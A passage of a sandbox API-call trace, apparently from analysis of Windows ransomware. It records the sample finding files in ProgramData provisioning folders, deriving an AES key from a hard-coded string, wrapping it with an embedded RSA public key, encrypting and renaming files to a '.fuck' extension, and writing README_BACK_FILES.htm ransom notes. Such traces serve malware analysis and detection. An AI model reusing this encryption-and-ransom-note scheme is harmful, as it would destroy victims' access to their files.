"c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.405] GetLastError () returned 0x5 [0237.405] GetLastError () returned 0x5 [0237.405] FindNextFileA (in: hFindFile=0x2845f60, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.405] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.406] GetLastError () returned 0x5 [0237.407] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml")) returned 0x20 [0237.407] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.407] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.407] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.408] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.408] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2844660) returned 1 [0237.413] CryptCreateHash (in: hProv=0x2844660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.413] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.413] CryptHashData (hHash=0x28462a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.413] CryptDeriveKey (in: hProv=0x2844660, Algid=0x6610, hBaseData=0x28462a0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2846260) returned 1 [0237.413] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.413] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.413] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2844c38) returned 1 [0237.414] CryptImportPublicKeyInfo (in: hCryptProv=0x2844c38, dwCertEncodingType=0x1, pInfo=0x283c0c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c0f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c100*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28462e0) returned 1 [0237.414] CryptEncrypt (in: hKey=0x28462e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.415] CryptEncrypt (in: hKey=0x28462e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844220*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2844220*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.415] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844220, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.415] ReadFile (in: hFile=0xffffffff, lpBuffer=0x284ad40, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x284ad40, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.415] CryptEncrypt (in: hKey=0x2846260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x284ad40*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x284ad40*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.415] WriteFile (in: hFile=0xffffffff, lpBuffer=0x284ad40, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.415] CloseHandle (hObject=0xffffffff) returned 1 [0237.415] CloseHandle (hObject=0xffffffff) returned 1 [0237.415] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.416] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.416] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg")) returned 0 [0237.416] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.fuck")) returned 0 [0237.416] CryptDestroyHash (hHash=0x28462a0) returned 1 [0237.416] CryptDestroyKey (hKey=0x2846260) returned 1 [0237.417] CryptReleaseContext (hProv=0x2844660, dwFlags=0x0) returned 1 [0237.417] FindNextFileA (in: hFindFile=0x2845f60, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.417] FindClose (in: hFindFile=0x2845f60 | out: hFindFile=0x2845f60) returned 1 [0237.417] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.417] AreFileApisANSI () returned 1 [0237.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.417] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.418] GetLastError () returned 0x5 [0237.418] GetLastError () returned 0x5 [0237.418] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.418] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.418] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\readme_back_files.htm")) returned 0xffffffff [0237.418] AreFileApisANSI () returned 1 [0237.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.418] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.419] GetLastError () returned 0x5 [0237.419] GetLastError () returned 0x5 [0237.419] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.419] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2846220 [0237.419] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.419] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.419] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.419] GetLastError () returned 0x5 [0237.419] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml")) returned 0x20 [0237.419] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.420] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.420] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.420] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.420] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2843d58) returned 1 [0237.426] CryptCreateHash (in: hProv=0x2843d58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.426] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.426] CryptHashData (hHash=0x28464e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.427] CryptDeriveKey (in: hProv=0x2843d58, Algid=0x6610, hBaseData=0x28464e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2845d60) returned 1 [0237.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.427] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2844088) returned 1 [0237.428] CryptImportPublicKeyInfo (in: hCryptProv=0x2844088, dwCertEncodingType=0x1, pInfo=0x283bf28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283bf58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283bf60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846260) returned 1 [0237.429] CryptEncrypt (in: hKey=0x2846260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.429] CryptEncrypt (in: hKey=0x2846260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844110*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2844110*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.429] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844110, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.429] ReadFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x284ed48, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.429] CryptEncrypt (in: hKey=0x2845d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x284ed48*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x284ed48*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.429] WriteFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.429] CloseHandle (hObject=0xffffffff) returned 1 [0237.429] CloseHandle (hObject=0xffffffff) returned 1 [0237.429] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.430] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.430] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg")) returned 0 [0237.430] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.fuck")) returned 0 [0237.431] CryptDestroyHash (hHash=0x28464e0) returned 1 [0237.431] CryptDestroyKey (hKey=0x2845d60) returned 1 [0237.431] CryptReleaseContext (hProv=0x2843d58, dwFlags=0x0) returned 1 [0237.431] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.431] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.431] GetLastError () returned 0x5 [0237.431] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml")) returned 0x20 [0237.435] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.435] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.436] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.436] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.436] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844198) returned 1 [0237.441] CryptCreateHash (in: hProv=0x2844198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.441] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.441] CryptHashData (hHash=0x2846320, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.441] CryptDeriveKey (in: hProv=0x2844198, Algid=0x6610, hBaseData=0x2846320, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846360) returned 1 [0237.441] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.441] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.441] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2843d58) returned 1 [0237.443] CryptImportPublicKeyInfo (in: hCryptProv=0x2843d58, dwCertEncodingType=0x1, pInfo=0x283bff8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c028*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c030*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28463a0) returned 1 [0237.443] CryptEncrypt (in: hKey=0x28463a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.443] CryptEncrypt (in: hKey=0x28463a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844330*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2844330*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.443] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844330, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.443] ReadFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x284ed48, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.443] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x284ed48*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x284ed48*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.443] WriteFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.443] CloseHandle (hObject=0xffffffff) returned 1 [0237.443] CloseHandle (hObject=0xffffffff) returned 1 [0237.443] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.444] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.444] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg")) returned 0 [0237.444] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.fuck")) returned 0 [0237.445] CryptDestroyHash (hHash=0x2846320) returned 1 [0237.445] CryptDestroyKey (hKey=0x2846360) returned 1 [0237.445] CryptReleaseContext (hProv=0x2844198, dwFlags=0x0) returned 1 [0237.445] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.445] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28464e0 [0237.445] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.445] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.445] FindFirstFileA (in: 